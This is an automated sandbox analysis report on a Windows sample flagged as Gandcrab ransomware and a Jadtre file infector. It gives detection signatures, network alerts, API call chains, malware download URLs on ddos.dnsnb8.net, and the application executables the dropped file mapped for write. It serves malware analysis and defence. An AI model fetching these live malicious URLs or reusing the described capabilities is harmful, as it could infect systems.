Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SY5DeZW6pz.exe

Overview

General Information

Sample Name:SY5DeZW6pz.exe
Analysis ID:694552
MD5:536f2c1238ef65a64820c35d4504ce67
SHA1:7806d51132e40728f581374a9d72d9713bff2dd0
SHA256:b6a71449958283718f01e6be9f7a9eb057479072c1cc55f26a11b033ea210271
Tags:exe
Infos:

Detection

Gandcrab, ReflectiveLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected Gandcrab
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected ReflectiveLoader
Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Found evasive API chain (may stop execution after checking mutex)
Infects executable files (exe, dll, sys, html)
Contains functionality to determine the online IP of the system
Found Tor onion address
PE file has a writeable .text section
Uses known network protocols on non-standard ports
Machine Learning detection for sample
Machine Learning detection for dropped file
PE file contains section with special chars
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
One or more processes crash
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Contains functionality to dynamically determine API calls
Uses the system / local time for branch decision (may execute only at specific dates)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
PE file contains executable resources (Code or Archives)
IP address seen in connection with other malware
Entry point lies outside standard sections
Creates a DirectInput object (often for capturing keystrokes)
Queries information about the installed CPU (vendor, model number etc)
AV process strings found (often used to terminate AV products)
Installs a raw input device (often for capturing keystrokes)
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Detected TCP or UDP traffic on non-standard ports
Checks if the current process is being debugged
PE file contains more sections than normal
Contains functionality to enumerate device drivers
Dropped file seen in connection with other malware
Uses Microsoft's Enhanced Cryptographic Provider

Classification

Process Tree

  • System is w10x64
  • SY5DeZW6pz.exe (PID: 5580 cmdline: "C:\Users\user\Desktop\SY5DeZW6pz.exe" MD5: 536F2C1238EF65A64820C35D4504CE67)
    • vSQshX.exe (PID: 5540 cmdline: C:\Users\user\AppData\Local\Temp\vSQshX.exe MD5: 56B2C3810DBA2E939A8BB9FA36D3CF96)
      • WerFault.exe (PID: 5876 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5540 -s 1432 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • WerFault.exe (PID: 1276 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5580 -s 532 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
SY5DeZW6pz.exeReflectiveLoaderDetects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommendedFlorian Roth
  • 0xf522:$x1: ReflectiveLoader
SY5DeZW6pz.exeSUSP_RANSOMWARE_Indicator_Jul20Detects ransomware indicatorFlorian Roth
  • 0xee7e:$: DECRYPT.txt
  • 0xeee4:$: DECRYPT.txt
SY5DeZW6pz.exeJoeSecurity_GandcrabYara detected GandcrabJoe Security
    SY5DeZW6pz.exeJoeSecurity_ReflectiveLoaderYara detected ReflectiveLoaderJoe Security
      SY5DeZW6pz.exeINDICATOR_SUSPICIOUS_ReflectiveLoaderdetects Reflective DLL injection artifactsditekSHen
      • 0xf521:$s1: _ReflectiveLoader@
      • 0xf522:$s2: ReflectiveLoader@
      Click to see the 1 entries

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000000.00000000.307805000.000000000F3A2000.00000008.00000001.01000000.00000003.sdmpJoeSecurity_GandcrabYara detected GandcrabJoe Security
        00000000.00000000.324852504.000000000F3A2000.00000008.00000001.01000000.00000003.sdmpJoeSecurity_GandcrabYara detected GandcrabJoe Security
          00000000.00000000.307798996.000000000F39A000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_ReflectiveLoaderYara detected ReflectiveLoaderJoe Security
            00000000.00000002.353018126.000000000F39A000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_ReflectiveLoaderYara detected ReflectiveLoaderJoe Security
              00000000.00000000.317764936.000000000F3A2000.00000008.00000001.01000000.00000003.sdmpJoeSecurity_GandcrabYara detected GandcrabJoe Security
                Click to see the 17 entries

                Unpacked PEs

                SourceRuleDescriptionAuthorStrings
                0.0.SY5DeZW6pz.exe.3760000.2.unpackReflectiveLoaderDetects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommendedFlorian Roth
                • 0xe522:$x1: ReflectiveLoader
                0.0.SY5DeZW6pz.exe.3760000.2.unpackSUSP_RANSOMWARE_Indicator_Jul20Detects ransomware indicatorFlorian Roth
                • 0xde7e:$: DECRYPT.txt
                • 0xdee4:$: DECRYPT.txt
                0.0.SY5DeZW6pz.exe.3760000.2.unpackJoeSecurity_GandcrabYara detected GandcrabJoe Security
                  0.0.SY5DeZW6pz.exe.3760000.2.unpackJoeSecurity_ReflectiveLoaderYara detected ReflectiveLoaderJoe Security
                    0.0.SY5DeZW6pz.exe.3760000.2.unpackINDICATOR_SUSPICIOUS_ReflectiveLoaderdetects Reflective DLL injection artifactsditekSHen
                    • 0xe521:$s1: _ReflectiveLoader@
                    • 0xe522:$s2: ReflectiveLoader@
                    Click to see the 43 entries

                    Sigma Signatures

                    No Sigma rule has matched

                    Snort Signatures

                    Timestamp:192.168.2.463.251.106.25497087992807908 08/31/22-23:41:31.686542
                    SID:2807908
                    Source Port:49708
                    Destination Port:799
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.463.251.106.25497077992807908 08/31/22-23:41:23.030290
                    SID:2807908
                    Source Port:49707
                    Destination Port:799
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.48.8.8.858565532838522 08/31/22-23:41:22.706087
                    SID:2838522
                    Source Port:58565
                    Destination Port:53
                    Protocol:UDP
                    Classtype:A Network Trojan was detected

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Multi AV Scanner detection for submitted file
                    Source: SY5DeZW6pz.exeVirustotal: Detection: 81%Perma Link
                    Source: SY5DeZW6pz.exeMetadefender: Detection: 65%Perma Link
                    Source: SY5DeZW6pz.exeReversingLabs: Detection: 95%
                    Antivirus / Scanner detection for submitted sample
                    Source: SY5DeZW6pz.exeAvira: detected
                    Antivirus detection for URL or domain
                    Source: http://ddos.dnsnb8.net:799/cj//k3.rar%Avira URL Cloud: Label: malware
                    Source: http://ddos.dnsnb8.net:799/cj//k3.rarAvira URL Cloud: Label: malware
                    Source: http://ddos.dnsnb8.net:799/cj//k2.rar%Avira URL Cloud: Label: malware
                    Source: http://ddos.dnsnb8.net:799/cj//k2.rarAvira URL Cloud: Label: malware
                    Source: http://ddos.dnsnb8.net/&Avira URL Cloud: Label: malware
                    Multi AV Scanner detection for domain / URL
                    Source: ddos.dnsnb8.netVirustotal: Detection: 5%Perma Link
                    Source: http://ddos.dnsnb8.net:799/cj//k3.rarVirustotal: Detection: 6%Perma Link
                    Antivirus detection for dropped file
                    Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeAvira: detection malicious, Label: W32/Jadtre.B
                    Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeAvira: detection malicious, Label: W32/Jadtre.B
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeAvira: detection malicious, Label: TR/Dldr.Small.Z.haljq
                    Multi AV Scanner detection for dropped file
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeMetadefender: Detection: 76%Perma Link
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeReversingLabs: Detection: 100%
                    Machine Learning detection for sample
                    Source: SY5DeZW6pz.exeJoe Sandbox ML: detected
                    Machine Learning detection for dropped file
                    Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeJoe Sandbox ML: detected
                    Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeJoe Sandbox ML: detected
                    Source: 1.0.vSQshX.exe.c20000.3.unpackAvira: Label: W32/Jadtre.D
                    Source: 0.2.SY5DeZW6pz.exe.3760000.0.unpackAvira: Label: W32/Jadtre.B
                    Source: 0.2.SY5DeZW6pz.exe.f390000.1.unpackAvira: Label: W32/Jadtre.B
                    Source: 1.0.vSQshX.exe.c20000.0.unpackAvira: Label: W32/Jadtre.D
                    Source: 1.2.vSQshX.exe.c20000.0.unpackAvira: Label: W32/Jadtre.D
                    Source: 0.0.SY5DeZW6pz.exe.3760000.2.unpackAvira: Label: W32/Jadtre.B
                    Source: 1.0.vSQshX.exe.c20000.1.unpackAvira: Label: W32/Jadtre.D
                    Source: 0.0.SY5DeZW6pz.exe.f390000.3.unpackAvira: Label: W32/Jadtre.B
                    Source: 0.0.SY5DeZW6pz.exe.f390000.1.unpackAvira: Label: W32/Jadtre.B
                    Source: 0.0.SY5DeZW6pz.exe.f390000.0.unpackAvira: Label: W32/Jadtre.B
                    Source: C:\Users\user\Desktop\SY5DeZW6pz.exeCode function: 0_2_0F394950 Sleep,ExitProcess,CreateThread,WaitForSingleObject,TerminateThread,CloseHandle,VirtualAlloc,GetModuleFileNameW,VirtualFree,ExitProcess,Sleep,lstrlenA,VirtualAlloc,CryptStringToBinaryA,ExitProcess,InitializeCriticalSection,DeleteCriticalSection,VirtualAlloc,GetModuleFileNameW,VirtualFree,ShellExecuteW,ExitThread,
                    Source: C:\Users\user\Desktop\SY5DeZW6pz.exeCode function: 0_2_0F398150 CryptAcquireContextW,VirtualAlloc,GetModuleHandleA,LoadLibraryA,GetProcAddress,CryptReleaseContext,VirtualFree,CryptReleaseContext,VirtualFree,
                    Source: C:\Users\user\Desktop\SY5DeZW6pz.exeCode function: 0_2_0F3962B0 CryptAcquireContextW,GetLastError,CryptAcquireContextW,CryptGenKey,CryptExportKey,CryptExportKey,CryptDestroyKey,CryptReleaseContext,CryptAcquireContextW,
                    Source: C:\Users\user\Desktop\SY5DeZW6pz.exeCode function: 0_2_0F396530 EnterCriticalSection,CryptAcquireContextW,GetLastError,CryptAcquireContextW,CryptImportKey,CryptGetKeyParam,CryptEncrypt,GetLastError,CryptReleaseContext,LeaveCriticalSection,
                    Source: C:\Users\user\Desktop\SY5DeZW6pz.exeCode function: 0_2_0F395210 lstrlenA,VirtualAlloc,CryptStringToBinaryA,_memset,lstrlenA,lstrlenA,lstrlenA,VirtualAlloc,lstrcpyA,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,VirtualFree,GetLastError,
                    Source: C:\Users\user\Desktop\SY5DeZW6pz.exeCode function: 0_2_0F395670 VirtualAlloc,wsprintfW,lstrlenW,lstrlenW,lstrlenW,_memset,lstrlenA,lstrlenW,lstrlenW,CryptBinaryToStringA,GetLastError,lstrlenA,lstrlenA,VirtualAlloc,lstrlenA,lstrlenA,lstrlenA,VirtualFree,VirtualFree,VirtualFree,
                    Source: C:\Users\user\Desktop\SY5DeZW6pz.exeCode function: 0_2_0F3982A0 CryptAcquireContextW,VirtualAlloc,GetModuleHandleA,LoadLibraryA,GetProcAddress,CryptReleaseContext,VirtualFree,CryptReleaseContext,VirtualFree,
                    Source: C:\Users\user\Desktop\SY5DeZW6pz.exeCode function: 0_2_0F395880 VirtualAlloc,CryptBinaryToStringA,CryptBinaryToStringA,CryptBinaryToStringA,lstrlenA,lstrlenA,lstrlenA,VirtualAlloc,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrcatW,lstrcatW,lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenA,lstrlenW,MultiByteToWideChar,lstrcatW,lstrlenW,lstrlenA,lstrlenW,MultiByteToWideChar,lstrcatW,lstrlenW,lstrlenW,VirtualAlloc,lstrlenW,lstrlenW,_memset,lstrlenA,lstrlenA,CryptBinaryToStringA,GetLastError,lstrlenA,VirtualAlloc,lstrlenA,lstrlenA,lstrlenA,lstrlenA,MultiByteToWideChar,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,
                    Source: SY5DeZW6pz.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: SY5DeZW6pz.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH

                    Spreading

                    barindex
                    Infects executable files (exe, dll, sys, html)
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\google\Update\1.3.36.131\GoogleUpdateComRegisterShell64.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\microsoft office\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.Container.NetFX40.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files\Google\Chrome\Application\104.0.5112.81\chrome_pwa_launcher.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\google\Update\1.3.36.131\GoogleUpdate.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\microsoft office\Office16\lync.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\microsoft office\Office16\misc.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\microsoft office\Office16\DCF\filecompare.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\microsoft office\Office16\lync99.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\autoit3\AutoIt3Help.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\java\jre1.8.0_211\bin\ssvagent.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\microsoft office\Office16\UcMapi.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\microsoft office\Office16\ONENOTE.EXE
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\microsoft office\Office16\PDFREFLOW.EXE
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\autoit3\Examples\Helpfile\Extras\MyProg.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\microsoft office\Office16\WINWORD.EXE
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\AcroBroker.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\microsoft office\Office16\MSOSREC.EXE
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\microsoft office\Office16\OUTLOOK.EXE
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\microsoft office\Office16\DCF\Common.DBConnection.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\microsoft office\Office16\protocolhandler.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\microsoft office\Office16\MSQRY32.EXE
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\wow_helper.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files\Google\Chrome\Application\104.0.5112.81\notification_helper.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\arh.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\microsoft office\Office16\SELFCERT.EXE
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\microsoft office\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.Container.NetFX45.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\microsoft office\Office16\WORDICON.EXE
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\microsoft office\Office16\MSPUB.EXE
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\google\Update\1.3.36.131\GoogleCrashHandler64.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files\Google\Chrome\Application\chrome.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\java\jre1.8.0_211\bin\jabswitch.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\ADelRCP.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\microsoft office\Office16\DCF\DATABASECOMPARE.EXE
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\google\Update\1.3.36.131\GoogleCrashHandler.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\microsoft office\Office16\SETLANG.EXE
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\autoit3\Aut2Exe\Aut2exe_x64.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\microsoft office\Office16\ACCICONS.EXE
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\microsoft office\Office16\FIRSTRUN.EXE
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\microsoft office\Office16\MSACCESS.EXE
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\microsoft office\Office16\POWERPNT.EXE
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\autoit3\Uninstall.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\google\Update\1.3.36.131\GoogleUpdateCore.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\microsoft office\Office16\DCF\Common.ShowHelp.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\microsoft office\Office16\SCANPST.EXE
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\autoit3\Au3Check.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\java\jre1.8.0_211\bin\jp2launcher.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\setup.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\microsoft office\Office16\MSOHTMED.EXE
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\microsoft office\Office16\CLVIEW.EXE
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\microsoft office\Office16\NAMECONTROLSERVER.EXE
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\microsoft office\Office16\IEContentService.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\java\jre1.8.0_211\bin\java.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\microsoft office\Office16\CNFNOT32.EXE
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files\Google\Chrome\Application\104.0.5112.81\Installer\chrmstp.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files\Microsoft Office\Office16\AppSharingHookController64.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\microsoft office\Office16\excelcnv.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\microsoft office\Office16\GROOVE.EXE
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\microsoft office\Office16\OcPubMgr.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\AcroRd32Info.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\java\jre1.8.0_211\bin\java-rmi.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\AcroTextExtractor.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\google\Update\1.3.36.131\GoogleUpdateBroker.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\java\jre1.8.0_211\bin\unpack200.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\java\jre1.8.0_211\bin\javacpl.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\microsoft office\Office16\ONENOTEM.EXE
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\AcroLayoutRecognizer\AcroLayoutRecognizer.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\microsoft office\Office16\msoev.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\microsoft office\Office16\MSOUC.EXE
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files\Microsoft Office\Office16\MSOHTMED.EXE
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\autoit3\SciTE\SciTE.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\microsoft office\Office16\GRAPH.EXE
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\microsoft office\Office16\EXCEL.EXE
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\microsoft office\Office16\PPTICO.EXE
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\LogTransport2.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\microsoft office\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.Container.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\microsoft office\Office16\lynchtmlconv.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\java\jre1.8.0_211\bin\javaws.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files\Google\Chrome\Application\104.0.5112.81\elevation_service.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\AcroCEF\RdrServicesUpdater.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\Eula.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\autoit3\Au3Info.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\autoit3\AutoIt3_x64.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\microsoft office\Office16\AppSharingHookController.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\microsoft office\Office16\OSPPREARM.EXE
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\microsoft office\Office16\MSOSYNC.EXE
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\microsoft office\Office16\XLICONS.EXE
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\microsoft office\Office16\DCF\Common.DBConnection64.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files\Microsoft Office\Office16\msoia.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\104.0.5112.81\chrome_installer.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\autoit3\Au3Info_x64.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\microsoft office\Office16\Wordconv.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\autoit3\Aut2Exe\Aut2exe.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\microsoft office\Office16\DCF\SPREADSHEETCOMPARE.EXE
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\microsoft analysis services\AS OLEDB\110\SQLDumper.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\microsoft office\Office16\VPREVIEW.EXE
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\reader_sl.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\autoit3\Aut2Exe\upx.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\google\Update\1.3.36.131\GoogleUpdateSetup.exe
                    Source: C:\Users\user\AppData\Local\Temp\vSQshX.exeSystem file mapped for write: C:\Program Files (x86)\microsoft office\Office16\msotd.exe
